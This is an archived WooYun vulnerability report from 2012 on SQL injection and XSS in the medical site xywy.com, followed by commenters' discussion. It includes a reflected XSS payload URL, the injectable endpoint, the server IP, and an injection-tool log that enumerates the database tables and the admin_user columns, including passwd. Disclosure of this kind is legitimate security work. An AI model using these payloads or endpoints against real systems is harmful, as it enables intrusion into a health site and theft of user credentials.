当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07938

漏洞标题:寻医问药sql注射致存在安全隐患(部分明文存储)

相关厂商:寻医问药

漏洞作者: zeracker

提交时间:2012-06-06 13:00

修复时间:2012-06-11 13:01

公开时间:2012-06-11 13:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-06: 细节已通知厂商并且等待厂商处理中
2012-06-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

首先为什么要评18分呢?
因为是看站点来的。
剑心,你就别说俺了。
希望国内能够重视乌云,重视安全,重视白帽子!
详情请见说明。

详细说明:

XSS跨站

http://club.xywy.com/zjzx/?type=list&cq=%22%3E%3Cscript%3Ealert%280604795%29%3B%3C/script%3E


注射漏洞:

http://c1.xywy.com/huodong/yspx/medal_team.php?id=326


Analyzing http://c1.xywy.com/huodong/yspx/medal_team.php?id=326
Host IP: 115.182.68.232
Web Server: XT-server/0.0
Powered-by: PHP/5.2.14p1
Can not find keyword but let me do a try!
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 6
Valid String Column is 1
DB Server: MySQL
Current DB: club
Count(table_name) of information_schema.tables where table_schema=0x636C7562 is 344
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x636C7562 is 344
Canceling...
Job Canceled!
Data Base Found: information_schema
Data Base Found: club
Data Base Found: new_club
Count(table_name) of information_schema.tables where table_schema=0x6E65775F636C7562 is 0
Table found: active_manage
Count(column_name) of information_schema.columns where table_schema=0x6E65775F636C7562 and table_name=0x6163746976655F6D616E616765 is 0
Column found: id
Count(table_name) of information_schema.tables where table_schema=0x636C7562 is 344
Table found: 111_doctor_stats_temp
Table found: 111_question
Table found: 111_question_detail
Table found: 111_reply
Table found: 111_tmp
Table found: 111_tmpdir
Table found: BoxItem
Table found: TopBox
Table found: acceptelec
Table found: act_egg
Table found: act_egg_back
Table found: act_egg_card
Table found: act_egg_tmp
Table found: active_manage
Table found: admin_fun
Table found: admin_fun_new
Table found: admin_group
Table found: admin_group_fun_new
Table found: admin_group_new
Table found: admin_log
Table found: admin_user
Table found: admin_user_fun
Table found: admin_user_log
Table found: admin_user_new
Table found: admin_user_post
Table found: admin_user_post_bak
Table found: admin_user_status
Table found: agree_count_data
Table found: article
Table found: attention_num
Table found: audit_time_set
Table found: baidu_question
Table found: baidu_question_temp
Table found: bak_20120523_question
Table found: bak_20120523_question_detail
Table found: bak_20120523_question_pic
Table found: bak_20120523_reply
Table found: banzhu_job_stat
Table found: bbs_topic
Table found: bbsconfig
Table found: blog_click
Table found: blog_commend
Table found: blog_common
Table found: blog_reply
Table found: blog_sort
Table found: blog_u
Table found: boxitem
Table found: business_club
Table found: ceng_click_count
Table found: chat_log_pigeonhole
Table found: chat_statistics
Table found: chatdoctorlist
Table found: chatinfo
Table found: chatlist
Table found: chattemp
Table found: choose_temp
Table found: chunjie_huodong
Table found: chunjie_huojiang
Table found: commend
Table found: commend_detail
Table found: commend_detail_temp
Table found: commend_doctor
Table found: commend_doctor_new
Table found: confident_temp
Table found: count_sendrecord
Table found: count_sendrecord_tmp
Table found: date_notice
Table found: del_data
Table found: deluser
Table found: depart_right
Table found: dialog
Table found: doc_tp_day
Table found: doc_tp_month
Table found: doc_tp_temp
Table found: doc_tp_week
Table found: doctor_card
Table found: doctor_card_assign
Table found: doctor_handle
Table found: doctor_medal_spread
Table found: doctor_stat
Table found: doctor_stat_20110923
Table found: doctor_stat_20110927
Table found: doctor_stat_20110930
Table found: doctor_stat_20111208
Table found: doctor_stat_20120101
Table found: doctor_stat_20120102
Table found: doctor_stat_20120114
Table found: doctor_stat_20120125
Table found: doctor_stat_20120406
Table found: doctor_stat_20120422m
Table found: doctor_stat_bak20120221
Table found: doctor_stat_maliu
Table found: doctor_stat_maliu_bak
Table found: doctor_stat_month
Table found: doctor_stat_month_0523
Table found: doctor_stat_month_0601
Table found: doctor_stat_month_0602
Table found: doctor_stat_month_0603
Table found: doctor_stat_month_bak
Table found: doctor_stat_old
Table found: doctor_stats_backup
Table found: doctor_stats_temp
Table found: doctor_stats_temp_20120422m
Table found: doctor_subject
Table found: exchange
Table found: expert_online
Table found: expert_online_time
Table found: extend_keyword
Table found: favor_doc
Table found: favor_drug
Table found: favor_drug_shop
Table found: favor_hospital
Table found: favor_jbill
Table found: favorite
Table found: favorite_folder
Table found: fill_keyword
Table found: fill_keyword_0606
Table found: fill_keyword_del
Table found: fill_keyword_lock
Table found: fill_keywords_skip
Table found: fill_question
Table found: fill_question_bak
Table found: filter_detail
Table found: filter_notify
Table found: filter_question
Table found: friend
Table found: getbbs_point
Table found: heath_awoke
Table found: home_count
Table found: home_guide_count
Table found: hospital_doc_link
Table found: hospital_question
Table found: hospital_question_temp
Table found: hot_infomation
Table found: huodong2008
Table found: huodong_2011
Table found: id_keyword
Table found: ill_to_subject
Table found: index_admin
Table found: index_ceng
Table found: invite_friend
Table found: ip_deny
Table found: jfsc_class
Table found: jfsc_class_20110929
Table found: jfsc_exchange
Table found: jfsc_exchange_detail
Table found: jfsc_product
Table found: jfsc_proimg
Table found: josso_role
Table found: josso_user_property
Table found: josso_user_role
Table found: keyword
Table found: keyword_ad
Table found: keyword_ad_new
Table found: keyword_ad_user
Table found: keyword_deny
Table found: keyword_deny_bak
Table found: keyword_deny_tmp
Table found: keyword_ini
Table found: message
Table found: messageold
Table found: new_doctor_commend
Table found: point
Table found: point22
Table found: point_20111008
Table found: point_process
Table found: point_process_backup20091221
Table found: point_process_bak
Table found: point_process_test
Table found: point_temp
Table found: point_tmp
Table found: presend
Table found: product
Table found: proxy_client_api
Table found: qq_group
Table found: que_agree_count
Table found: ques_zjt
Table found: question
Table found: question091101
Table found: question091101_attach
Table found: question091101_detail
Table found: question091101_pic
Table found: question091101_reply
Table found: question100501
Table found: question100501_attach
Table found: question100501_detail
Table found: question100501_pic
Table found: question100501_reply
Table found: question101001
Table found: question101001_attach
Table found: question101001_detail
Table found: question101001_pic
Table found: question101001_reply
Table found: question110201
Table found: question110201_attach
Table found: question110201_detail
Table found: question110201_pic
Table found: question110201_reply
Table found: question110719
Table found: question110719_attach
Table found: question110719_detail
Table found: question110719_pic
Table found: question110719_reply
Table found: question110814
Table found: question110814_attach
Table found: question110814_detail
Table found: question110814_pic
Table found: question110814_reply
Table found: question110922
Table found: question110922_attach
Table found: question110922_detail
Table found: question110922_pic
Table found: question110922_reply
Table found: question111202
Table found: question111202_attach
Table found: question111202_detail
Table found: question111202_pic
Table found: question111202_reply
Table found: question120202
Table found: question120202_attach
Table found: question120202_detail
Table found: question120202_pic
Table found: question120202_reply
Table found: question120523
Table found: question120523_attach
Table found: question120523_detail
Table found: question120523_pic
Table found: question120523_reply
Table found: question_0814_bak
Table found: question_20110916
Table found: question_attach
Table found: question_attach_old
Table found: question_attach_tmp
Table found: question_broadcast
Table found: question_del
Table found: question_del_stat_backup
Table found: question_del_stat_temp
Table found: question_detail
Table found: question_detail_0814_bak
Table found: question_detail_new
Table found: question_detail_tmp_bak
Table found: question_elite
Table found: question_elite_temp
Table found: question_fristpage
Table found: question_hos_doc
Table found: question_hos_doc_tmp
Table found: question_jib
Table found: question_new
Table found: question_pass
Table found: question_pic
Table found: question_pic_0814_bak
Table found: question_pic_new
Table found: question_pic_tmp_bak
Table found: question_recycle
Table found: question_reply_lock
Table found: question_reply_time
Table found: question_shortmsg_set
Table found: question_temp
Table found: question_tmp_bak
Table found: question_total_day
Table found: question_total_subject
Table found: question_total_subject_comeback
Table found: question_total_tmp
Table found: questionold
Table found: questionold090228
Table found: questionold090228_attach
Table found: questionold090228_detail
Table found: questionold090228_pic
Table found: questionold090228_reply
Table found: questionold_attach
Table found: questionold_detail
Table found: questionold_pic
Table found: questionold_reply
Table found: quick_question
Table found: range_keywords
Table found: rational_to_question
Table found: receive_msg
Table found: record_space
Table found: reply
Table found: reply_0814_bak
Table found: reply_201205211251
Table found: reply_del_temp
Table found: reply_new
Table found: reply_recycle
Table found: reply_taolun
Table found: reply_taolun_194
Table found: reply_temp
Table found: reply_tmp_bak
Table found: search_history
Table found: search_keyword
Table found: search_keyword_sell
Table found: search_keyword_sell_pre
Table found: search_question
Table found: search_question_xg
Table found: send_email
Table found: shortmsg_info
Table found: shortmsg_send_count
Table found: sina_user
Table found: soft_offon
Table found: soft_r
Table found: subject_owner
Table found: subyqlj
Table found: system_msg_readruser
Table found: tag_keyword
Table found: tmp_hospital
Table found: tmppp
Table found: topbox
Table found: topics_actions
Table found: tousu
Table found: user_act_email
Table found: user_action
Table found: user_action_20110908
Table found: user_action_20120502
Table found: user_action_reply
Table found: user_album
Table found: user_album_folder
Table found: user_attention
Table found: user_blog
Table found: user_blog_bak
Table found: user_blog_kind
Table found: user_callin
Table found: user_common_info
Table found: user_common_new
Table found: user_doctor_info
Table found: user_doctor_new
Table found: user_doctor_reply_tuan
Table found: user_job
Table found: user_link_rr
Table found: user_new
Table found: user_setting
Table found: user_setting_back
Table found: user_time
Table found: user_work_info
Table found: user_youke_new
Table found: wb_address
Table found: wb_answer_log
Table found: wb_card
Table found: wb_faverite
Table found: wb_get_faverite_log
Table found: whx_test
Table found: youjiangdiaocha
Table found: youjiangdiaocha_people
Table found: youjiangdiaocha_tongji
Table found: zhaopin
Count(column_name) of information_schema.columns where table_schema=0x636C7562 and table_name=0x61646D696E5F75736572 is 7
Column found: id
Column found: pid
Column found: username
Column found: passwd
Column found: createtime
Column found: subject
Column found: userid



漏洞证明:


修复方案:

加强安全体系!!!
树立安全意识!

版权声明:转载请注明来源 zeracker@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-06-11 13:01

厂商回复:

最新状态:

2012-06-11:多谢提醒了~

漏洞评价:

评论

  1. 2012-06-06 13:16 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    哥们 /corp_detail.php?corp=%E5%AF%BB%E5%8C%BB%E9%97%AE%E8%8D%AF 我不会确认的

  2. 2012-06-06 13:17 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @_Evil 这个是什么?

  3. 2012-06-06 13:18 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @zeracker 这个厂家没确认过漏洞

  4. 2012-06-06 13:26 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    看到这个 WooYun: 寻医问药分站存在SQL注射漏洞、弱口令及使用了存在漏洞的编辑器 ,3rank,你会伤心的~

  5. 2012-06-06 13:27 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @_Evil @gainover 伤心没用的,剑心都不出来帮忙力挺,失望。。他公开我这个,就会死的。。你懂的。

  6. 2012-06-06 13:29 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    公开倒不会吧~ 这个厂家还是会确认漏洞的, 已公开 的那些都是确认的。 只是给的rank挺低~~

  7. 2012-06-06 13:32 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    rank能当饭吃吗?

  8. 2012-06-06 13:34 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @momo 能。

  9. 2012-06-06 13:37 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    @zeracker 对你这个2,我很无语的。

  10. 2012-06-06 13:43 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @momo 注意语言表达 -_-||||| 这里是公众场合

  11. 2012-06-06 15:00 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @momo 这个世界里,不公平的地方太多了,总会有很多人付出了,得不到应有的回报。rank说起来是不值什么,也不能兑换成money,也不能拿来泡妹子。 但有些事情总是需要有人去做的,虽然很多人没有得到厂商的肯定和尊重。不论哪个行业,总是存在那么一批,因为兴趣而热爱,而不是因为利益而入魔的群体。 “WooYun将一切对安全极为感兴趣,对事物运行的原理有着天生的好奇心,愿意将技术回归技术,愿意为其他朋友做出贡献的人定义为白帽子”,从乌云对白帽子的定义看来,亦如此,“兴趣”才是落脚点。 如果大家是为利益来的,还呆乌云做什么呢? 如果什么都以“利益”为优先,乌云也就不存在了,为乌云的建设付出努力的那些人,又凭什么拿出自己的时间去为大家建设者们一个平台呢?黑与白是2个并行,且相辅相成的世界,所以个人认为,不应该以自己的世界观对别人加以评判。

  12. 2012-06-06 15:02 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @gainover 哥们好样的

  13. 2012-06-06 16:00 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    有些厂商rank给的很不靠谱诶,还是要多去大公司挖啊,rank靠谱有时候还有礼物。看看这个,要了5rank,才给了1rank,你会伤心的。。 WooYun: 寻医问药提问XSS

  14. 2012-06-06 16:31 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @px1624 一个xss一分。这个危害就不用说了。

  15. 2012-06-06 16:34 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    @gainover 301是我朋友,不然也不会和他开玩笑,你真闲。你好伟大啊。

  16. 2012-06-06 16:55 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @momo 你真够无语的。让别人怎么看。— —

  17. 2012-06-06 17:13 | 小禾吉 ( 路人 | Rank:0 漏洞数:1 | 宇宙的目的很可能和人类没有关系,宇宙很可...)

    @momo 有些人开玩笑 有些人认真 矛盾就产生了~

  18. 2012-06-06 17:18 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    @小禾吉 所以,社会上,闲的人很多啊。

  19. 2012-06-06 18:02 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @小禾吉 @momo ,闲是蛮闲的,伟大这个词,如果能用在我身上,我早就带领劳苦大众翻身做主人了。。哈哈。 -- 我确实是站在一个“非玩笑”的角度来思考这个问题,虽然momo只是一句玩笑话,但是这句话,不少人也会去想。 至于矛盾,哪有那么容易产生的,矛盾是积累才会有的~

  20. 2012-06-06 18:03 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @gainover 呵呵。他嘴巴就是这样子的。木事。谢谢G哥关心。

  21. 2012-06-06 18:23 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    矛盾?。。。这个帖子能得多少rank貌似已经被无视了。。。

  22. 2012-06-06 18:39 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    寻医问药的漏洞太多了。。。大哥们就别挖了。。对方也不重视的

  23. 2012-06-06 18:41 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    俺只是顺手看到。

  24. 2012-06-06 18:54 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    We are whitehats

  25. 2012-06-06 21:53 | nidao ( 路人 | Rank:7 漏洞数:3 | 还是木有。)

    我是来看评论的。。。

  26. 2012-06-11 13:53 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    哈哈,忽略了。给力。

  27. 2012-06-11 14:00 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    哎,看样子又是各种脱库。现在用户的数据真是不值钱。

  28. 2012-06-12 00:32 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    2012年6月11日:多谢提醒了~~简直就是个悲剧!!忽略算什么?然后感谢?让用户数据裸奔的企业,不是好企业!

  29. 2012-06-12 16:26 | 寻医问药(乌云厂商)

    @zeracker 非常感谢您。漏洞已经修复,明文密码已在修改。